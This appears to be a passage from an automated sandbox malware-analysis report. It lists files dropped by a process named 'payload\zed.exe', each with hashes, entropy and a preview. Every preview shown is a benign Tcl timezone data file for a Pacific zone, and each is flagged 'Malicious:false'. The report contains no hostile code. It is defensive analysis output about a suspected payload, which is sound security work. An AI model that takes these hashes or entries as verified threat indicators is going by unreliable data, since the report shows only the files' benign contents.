                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yc6e8SHAIgOb6eKAN/NWyVheo:MByMdniinbtNWzo
                                                                                                                                                                                                                                            MD5:4244078A03C2493009EF2F6BDA2F326F
                                                                                                                                                                                                                                            SHA1:AC2FF3E91A8831A479B33DF32A0118BC2EB255D0
                                                                                                                                                                                                                                            SHA-256:6E52B361AC8A6A578C709F6D58AA7535F06C0CB1707081C2D5A63FA8545D955C
                                                                                                                                                                                                                                            SHA-512:398B32E0FAF80E40DF3ACD203DF380D61DC39322F0BA0388A18281BC26973945F45683A104B9A785BB9DF5E514322F6994F934289E4B56B7982F94D4528D4272
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:Pacific/Johnston) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.669308556946547
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/KyXDm2OHEMmzQwXy29BVyv7y/fTVVFty:MB86KyTmdHEZzQUBVyDy/fZvty
                                                                                                                                                                                                                                            MD5:544A0A83241333805192A6F03888E359
                                                                                                                                                                                                                                            SHA1:99D2BE79D57B44BD538386F9E7551C9E1874D7E3
                                                                                                                                                                                                                                            SHA-256:0B1345555EC2B4738CC4DEBFE496C287966F238386263032FF1E27912CCBFBA6
                                                                                                                                                                                                                                            SHA-512:61C91265632D01FBB7F4C739368756C428258FA6C141E49E88B6C78ABEA6150A74B8DFCF14C5AADDA03C1EA6F04D122734654495C26B8614561786B1C5C7EF10
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kanton) {.. {-9223372036854775808 0 0 -00}.. {-1020470400 -43200 0 -12}.. {307627200 -39600 0 -11}.. {788871600 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.739672105601744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/iSDm2OHjkeoHvmLVFFz4YWXfSzvjNv:MB86iGmdHpCvU4VfSbxv
                                                                                                                                                                                                                                            MD5:1B695BBB9C50F6AFC05F67DE30374160
                                                                                                                                                                                                                                            SHA1:08AD8BBB6C99EB36FC3E462DB41C6896F52F150C
                                                                                                                                                                                                                                            SHA-256:4F7235B956A5A01676BE05275E086D5157EBC24FD91022E87817020669F915F7
                                                                                                                                                                                                                                            SHA-512:DC35CB1C2E5E035A82F91D1B1F4B48D7B112D9B7A1A7DB9C4A4C42C4D58002E1ECD9D24B2EA5B624DBB526ADDF9A8AB37D4315843207C34C16B2EFE33A254752
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kiritimati) {.. {-9223372036854775808 -37760 0 LMT}.. {-2177415040 -38400 0 -1040}.. {307622400 -36000 0 -10}.. {788868000 50400 0 +14}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):394
                                                                                                                                                                                                                                            Entropy (8bit):4.441317927120857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB869nmdHlCTvrvCvKcHwzHHI/HKOjHHwZaLYkcy:2ecrrqvGznISknwZaLxcy
                                                                                                                                                                                                                                            MD5:B489D7BDE8EB805B2A24726A6FB0C441
                                                                                                                                                                                                                                            SHA1:7997A33AA56857EC52B1198DBEF4CE1DB50D69FD
                                                                                                                                                                                                                                            SHA-256:B528E5E712E5F878603183E7CCFF55E5DB97CB47D7628BCB635342796317B899
                                                                                                                                                                                                                                            SHA-512:4898AC2747FB8620BE29933CC7AA344AF1A3B7777D1AFF08BB4C6CE6E7AF205581937CCB488F3CB39CC8CA7FB42EDC8E1CAD8BADC9FCA40E3CAD23271CD66FCB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kosrae) {.. {-9223372036854775808 -47284 0 LMT}.. {-3944631116 39116 0 LMT}.. {-2177491916 39600 0 +11}.. {-1743678000 32400 0 +09}.. {-1606813200 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-770634000 39600 0 +11}.. {-7988400 43200 0 +12}.. {915105600 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):304
                                                                                                                                                                                                                                            Entropy (8bit):4.5947337310364835
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/yEyDm2OH4T2eoHvmfKnOjvScHrkL/Xy2185k0YAov:MB86XmmdHWCv6KOjHHgLN8tby
                                                                                                                                                                                                                                            MD5:7D1FC9913941693ACBD6A3CCB2F34555
                                                                                                                                                                                                                                            SHA1:D07C8AAED1DF9614BCA6EEF0F72FB98BE46CF5EF
                                                                                                                                                                                                                                            SHA-256:38133BE70100D7DC244A680827879E6B240646C7C0B68F58652051E681A71985
                                                                                                                                                                                                                                            SHA-512:419F0A1D1D71C8F84765C7B54271D7EFD6A81F428751523A214ABB24A8770DD5A7666F634A20AF97D5AAB8F21C0DEF23DCDE068CF4C1CCC7639ABC43864A9DBC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kwajalein) {.. {-9223372036854775808 40160 0 LMT}.. {-2177492960 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-817462800 39600 0 +11}.. {-7988400 -43200 0 -12}.. {745934400 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.7986219497241995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHznHlUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/QxNn
                                                                                                                                                                                                                                            MD5:EB409C340A475B60993965A0E2892B6E
                                                                                                                                                                                                                                            SHA1:819881A078F34EF8FC55D71D829B82C56E6723D7
                                                                                                                                                                                                                                            SHA-256:935BC00C13863715D09463E54DC2A6FF0F1A7EEA8D5895C87836AA59716CBD57
                                                                                                                                                                                                                                            SHA-512:A28AF85022F8B3C2EE5F93BF6FDC0C349B73F25D88BA151ACE424EED1A95FA29608A6B1AD3D5FD952B2FB7F48DF6FDF8E6504F2B53E6782E4FF73335AF9A15C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Majuro) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.976348164850869
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHzrHeWNMXGm2OHOx5oHsdNpNFvvIVVFvYy:SlSWB9eg/cHeSDm2OHOnoH4/FvQVVFAy
                                                                                                                                                                                                                                            MD5:80CB45F42BAB1AA72CD7C7BC394DF3F8
                                                                                                                                                                                                                                            SHA1:8B5ED2BCCA1AEB41F22AFD14F46533959828B2BE
                                                                                                                                                                                                                                            SHA-256:AE0B5055C6E57516F23749B13681205EAD376E682959716A457B1377AF8160BA
                                                                                                                                                                                                                                            SHA-512:71562E340B7A96B91D04FCBCAF71B66EA725CA1BD1094343C4442F8F9A8C67A3BE378034849197407D21C3EE74E2C753B1FD3BAFF2378714B993AD9336236A0E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Marquesas) {.. {-9223372036854775808 -33480 0 LMT}.. {-1806676920 -34200 0 -0930}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.81307101485774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHz0HvUDHurKv:SlSWB9vsM3yciemHAIgObiecN/Zevn
                                                                                                                                                                                                                                            MD5:13CE48F8FF74BFCEFCB8D217D6357E38
                                                                                                                                                                                                                                            SHA1:296D31E3F868934C6EB34BF1BF4C23F3E1839294
                                                                                                                                                                                                                                            SHA-256:F62C6A2DEC1E9EC78115D5F14E5B9DB7C86F788662D2E68F7E6714F4A05DC974
                                                                                                                                                                                                                                            SHA-512:778813FC08EF803743F392000BECE73C1C079883DAFC26FAC0AF8FA3FA4AE1D94BA8F3CAA5E82DD4DB1A5F12AD49E123901908F5483E0E325952622AB4C4A26A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Midway) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):244
                                                                                                                                                                                                                                            Entropy (8bit):4.702705620563736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/JdDm2OHceoHx6sCH/ZdqvScH9cd0YAov:MB86J5mdH9CMhcHHauby
                                                                                                                                                                                                                                            MD5:30A8285FCCE2E98889E53DF60B906C3D
                                                                                                                                                                                                                                            SHA1:C7789CB11A2C8FE3861FF3C0A7A41F6CAFD87631
                                                                                                                                                                                                                                            SHA-256:22C367F3219B5FC736260D9DBFEF5FCB767F1A6BDA991C9352F790A3D1FFE884
                                                                                                                                                                                                                                            SHA-512:02DA82680588839B06F820979AECC78B7FBEAB9D6D49176B513B80F1C8BA2D55FB3674B19EFDD574EE6FC01539EF7C3081A4B34D14A54DACF367D816B62E5843
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Nauru) {.. {-9223372036854775808 40060 0 LMT}.. {-1545131260 41400 0 +1130}.. {-862918200 32400 0 +09}.. {-767350800 41400 0 +1130}.. {287418600 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.846897598147338
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHwMQA3WNMXGm2OH0SNoHoRWVGXyOyovFaSUGFAZvBByV:SlSWB9eg/Jm3SDm2OHJoHFGXCodZUGFd
                                                                                                                                                                                                                                            MD5:6E8EC957423917AE7A7EF503661C1A77
                                                                                                                                                                                                                                            SHA1:B4FA3C3E3F96C28B7DB87BFD441D2EE99CC81B6F
                                                                                                                                                                                                                                            SHA-256:869CCA656BE88E4E7481C75737C3656BAB6924AD1751505815AC719C59269842
                                                                                                                                                                                                                                            SHA-512:9047ABE673259699C7A548BC7B5636DD646DD382C751B796522F65404162AB1B0BB022FD274653921E5B23C847EE248AEF6749E15ED2CFC1DCE35BBA294D8251
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Niue) {.. {-9223372036854775808 -40780 0 LMT}.. {-543069620 -40800 0 -1120}.. {-173623200 -39600 0 -11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5139
                                                                                                                                                                                                                                            Entropy (8bit):3.65794255179185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:K/yg8hZbeS07HbbYTqge+gDrWnAxhejtB0e+Pwn1UVimqNQrKvyXrStkCDv:K/y7hNeS07sq0Erk10lINQrKvyXrwv
                                                                                                                                                                                                                                            MD5:E19700A894AA64715D14F501D8D2FA98
                                                                                                                                                                                                                                            SHA1:57CFC96E2EBB985720DB290F59181860AF2AC1AA
                                                                                                                                                                                                                                            SHA-256:5D16C3EF1DB996C1B8E33AD884C33946F77DA872F35F41EC3BD5B288F43CC9AF
                                                                                                                                                                                                                                            SHA-512:E11EAF2A7B217CDBEECB57635184F04171F0DB088FCC4702AA8D40A3A5453904592F5869849913E2EB02DC5941C84203A76D270E8930B0B691A3B9C39B78BF30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Norfolk) {.. {-9223372036854775808 40312 0 LMT}.. {-2177493112 40320 0 +1112}.. {-599656320 41400 0 +1130}.. {152029800 45000 1 +1230}.. {162916200 41400 0 +1130}.. {1443882600 39600 0 +11}.. {1561899600 39600 0 +12}.. {1570287600 43200 1 +12}.. {1586012400 39600 0 +12}.. {1601737200 43200 1 +12}.. {1617462000 39600 0 +12}.. {1633186800 43200 1 +12}.. {1648911600 39600 0 +12}.. {1664636400 43200 1 +12}.. {1680361200 39600 0 +12}.. {1696086000 43200 1 +12}.. {1712415600 39600 0 +12}.. {1728140400 43200 1 +12}.. {1743865200 39600 0 +12}.. {1759590000 43200 1 +12}.. {1775314800 39600 0 +12}.. {1791039600 43200 1 +12}.. {1806764400 39600 0 +12}.. {1822489200 43200 1 +12}.. {1838214000 39600 0 +12}.. {1853938800 43200 1 +12}.. {1869663600 39600 0 +12}.. {1885993200 43200 1 +12}.. {1901718000 39600 0 +12}.. {1917442800 43200 1 +12}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):326
                                                                                                                                                                                                                                            Entropy (8bit):4.531117764974758
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/JcSDm2OHTYoHgnX2czO/FxgV62JFy:MB86JcGmdHTYCgX2czUjgM2ny
                                                                                                                                                                                                                                            MD5:2F1E92A11DF44C72DC305C13111DEA35
                                                                                                                                                                                                                                            SHA1:847F551C3D6C75CD2D0D6D87FCF3294CA8DD90B2
                                                                                                                                                                                                                                            SHA-256:238683C027D2319C33D975A837E9FC9D24DD53B1A67108EDBF7ABDF0DB050881
                                                                                                                                                                                                                                            SHA-512:E35D8C71AFDBB9A7507E873925001AEDE3734B1D235F509D19952E85279CBCC233A73412EA1F79CB534A45D36FEAA8AFDA98D9964DC93C7892B318F4AFC9A076
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Noumea) {.. {-9223372036854775808 39948 0 LMT}.. {-1829387148 39600 0 +11}.. {250002000 43200 1 +11}.. {257342400 39600 0 +11}.. {281451600 43200 1 +11}.. {288878400 39600 0 +11}.. {849366000 43200 1 +11}.. {857228400 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.985607855830399
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHurKeTFfXMXGm2OH2ivkeoHvUPi1TsYoHsdfWTVvvVFv:SlSWB9eg/XecDm2OH23eoHvWieYoHiWB
                                                                                                                                                                                                                                            MD5:E86D90DAA694B0EAC42F8C01346BC95B
                                                                                                                                                                                                                                            SHA1:CD29DEFC291C939296E86DC7EF5D0654D85285E8
                                                                                                                                                                                                                                            SHA-256:CCA96640AB3BC707224FA86D9AF66F9D53A204A97B370B2785BA8208688BF8B6
                                                                                                                                                                                                                                            SHA-512:937BA420061E3781F831779B458E914A0FC465C4B41796F8B7CB1E548822F5777A6450FC6002AB13EBC5C9F54E374D3ED731D05B2B302B95359BE34094E5062B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Pago_Pago) {.. {-9223372036854775808 45432 0 LMT}.. {-2445424632 -40968 0 LMT}.. {-1861879032 -39600 0 SST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.919381181565273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHugEZF3fMXGm2OHKvkeoHucRbgnJnoHvmdQ4+vScFAy:SlSWB9eg/Xg2PDm2OHK8eoHTWJnoHvmi
                                                                                                                                                                                                                                            MD5:2E6C7EC61C7E29A147475C223B163F6B
                                                                                                                                                                                                                                            SHA1:3A98D3441335224E7EBC0648990BCA1DE3BDF5C6
                                                                                                                                                                                                                                            SHA-256:97DE6C2C717BFEAD00F83B5D39D654C32CEE580226F5F084484EBAD57BBCE7FF
                                                                                                                                                                                                                                            SHA-512:5868C43966DDEBA8EC4BBBB29CDFDDFF0C7B01FD4D579FF655F3363029059F969B39C9221190672B6A2F7938583594AA0B103FC2A7ED573E2BC1C3A1623DE8DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Palau) {.. {-9223372036854775808 -54124 0 LMT}.. {-3944624276 32276 0 LMT}.. {-2177485076 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.809907977056877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHuQTWLMbNMXGm2OHUVFvoHvmXUlgloWkcyf/vGpn:SlSWB9eg/XQyLMJDm2OHUVVoHvmXUKm2
                                                                                                                                                                                                                                            MD5:3F4987676F9C461895EDF9985AD22E06
                                                                                                                                                                                                                                            SHA1:A96E470209010B837EF5BB3AC93BAE74BF2CCF64
                                                                                                                                                                                                                                            SHA-256:5D363729A986E24C79F4B817CC88D2B22ACCCE3ADD20138D51C4422C4297AD6F
                                                                                                                                                                                                                                            SHA-512:988FB98EFD3F57F5D66A932CC6B9D0387E9B0951FC590E08DAF19ACF5E4F39BC1B25265F16E14930BCF394902F5F0EF507E0E91C98902DFB10FA16D716091AB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Pitcairn) {.. {-9223372036854775808 -31220 0 LMT}.. {-2177421580 -30600 0 -0830}.. {893665800 -28800 0 -08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.7682565894416005
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycaJHNPHAIgObaJHa6N/XyopJHYn:MByMdaJyiaJrtCopJ4n
                                                                                                                                                                                                                                            MD5:1B418E3A4239AAFE1E15B57FFF913FA1
                                                                                                                                                                                                                                            SHA1:0E278FCC058DE1B3F4715771819F14568A6C10BB
                                                                                                                                                                                                                                            SHA-256:F744CD8337C5C72023D61F348DD03F48824F817D62F54ACC6A23DDD8B0F9EDC4
                                                                                                                                                                                                                                            SHA-512:8E3E10B41CF64A07411B272C0BCA6DC7AA9FFBF625B31075651603B7D0A52A719F7174A67593BFDE45725C243D347D01560B2BC7813C2ABD2F4BF4B1BAD57E56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guadalcanal)]} {.. LoadTimeZoneFile Pacific/Guadalcanal..}..set TZData(:Pacific/Pohnpei) $TZData(:Pacific/Guadalcanal)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.742862539020017
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycaJHNPHAIgObaJHa6N/X3HpBJHYn:MByMdaJyiaJrtHpBJ4n
                                                                                                                                                                                                                                            MD5:514C399D990C87271812440A4B19FB21
                                                                                                                                                                                                                                            SHA1:E1512482D10C8984DCD69C883F07C412E144081A
                                                                                                                                                                                                                                            SHA-256:5BB11553F711BD591617F657A9D1811CC3E3FB46374F6867316A7C8F6B3765D9
                                                                                                                                                                                                                                            SHA-512:DB227134822EA73407B6C0259FF7413D4961B558F3018BFF51E4E426DDB2DF581DCF7A6DE9E4890CE35F785BC3D07CC880DA883C93D73FFB249F403701BD8023
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guadalcanal)]} {.. LoadTimeZoneFile Pacific/Guadalcanal..}..set TZData(:Pacific/Ponape) $TZData(:Pacific/Guadalcanal)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.945354510868153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHuwKXI3SMXGm2OHwdvoHvZUeQTnoo3v/vnqMVVMUMy:SlSWB9eg/X/43SDm2OHwdvoHvZZQTnoQ
                                                                                                                                                                                                                                            MD5:2CFB7C2A3D26D7AF0F6AE32ADD81C364
                                                                                                                                                                                                                                            SHA1:80C96E50D23A9A9531E4EE33744CF445C054B901
                                                                                                                                                                                                                                            SHA-256:124C137B091D9D54D5E0579131485428FAAE040ACC978D20D6A8C8E4DE9889AA
                                                                                                                                                                                                                                            SHA-512:A215FF5A69BD3E786BD3F8C952C8593396402EFA85005F5342093028617A6862EAE8BFD7B6D5737F90D90897AB62CF785544A4157A222AE4D0F70797FFBEC2CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Port_Moresby) {.. {-9223372036854775808 35320 0 LMT}.. {-2840176120 35312 0 PMMT}.. {-2366790512 36000 0 +10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):969
                                                                                                                                                                                                                                            Entropy (8bit):3.943959457262612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86VrjmdHI5Cvn9HCFkN00hjNFq++UE+q0hwA+A7VxVnDEFn:IeZv8w0MNFq+xE+uAtx1c
                                                                                                                                                                                                                                            MD5:64AD3A103F4D145C48484BF8FACF41C2
                                                                                                                                                                                                                                            SHA1:40C00CFA56C87E506C254A93A164D7227DFF3BD5
                                                                                                                                                                                                                                            SHA-256:5AB006A686E564E30C94884FF8A9D728AEC74681DA8772E9722B6FE203630B5D
                                                                                                                                                                                                                                            SHA-512:D1088C3B673B5456A8706B69BE4D7AB18615EE53A82BF4ABE76E86700837E6BAD0BD79C13EDA9B04776B08A95B835BA755AA565F86E45BFE507E8783896C1EE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Rarotonga) {.. {-9223372036854775808 48056 0 LMT}.. {-2209555256 -38344 0 LMT}.. {-543072056 -37800 0 -1030}.. {279714600 -34200 0 -10}.. {289387800 -36000 0 -10}.. {309952800 -34200 1 -10}.. {320837400 -36000 0 -10}.. {341402400 -34200 1 -10}.. {352287000 -36000 0 -10}.. {372852000 -34200 1 -10}.. {384341400 -36000 0 -10}.. {404906400 -34200 1 -10}.. {415791000 -36000 0 -10}.. {436356000 -34200 1 -10}.. {447240600 -36000 0 -10}.. {467805600 -34200 1 -10}.. {478690200 -36000 0 -10}.. {499255200 -34200 1 -10}.. {510139800 -36000 0 -10}.. {530704800 -34200 1 -10}.. {541589400 -36000 0 -10}.. {562154400 -34200 1 -10}.. {573643800 -36000 0 -10}.. {594208800 -34200 1 -10}.. {605093400 -36000 0 -10}.. {625658400 -34200 1 -10}.. {636543000 -36000 0 -10}.. {657108000 -34200 1 -10}.. {667992600 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.854594370903023
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG5RFeyXHAIgObT5RV5RL/nUDHtluKpUDH5Rgn:SlSWB9vsM3ycdeSHAIgOb7N/vKbn
                                                                                                                                                                                                                                            MD5:EFC985F07B24BEDA22993C9D0EA7E022
                                                                                                                                                                                                                                            SHA1:6D05D12925621F1D05999A5DCC81B8C6F4D18945
                                                                                                                                                                                                                                            SHA-256:4F6A1C20A11E186012466091CD4B3C09D89D35E7560F93874DEC2D7F99365589
                                                                                                                                                                                                                                            SHA-512:5FB4D8784D2EB8AEF660D6CBC7C403561EE5874BEC0439762F3688C64830B52B1F557B467CA65B64B1210E82F385E134BF676F3CA443FB480702A2C90B3C3757
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guam)]} {.. LoadTimeZoneFile Pacific/Guam..}..set TZData(:Pacific/Saipan) $TZData(:Pacific/Guam)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.78073436515702
                                                                                                                                                                                                                                            Encrypted:false
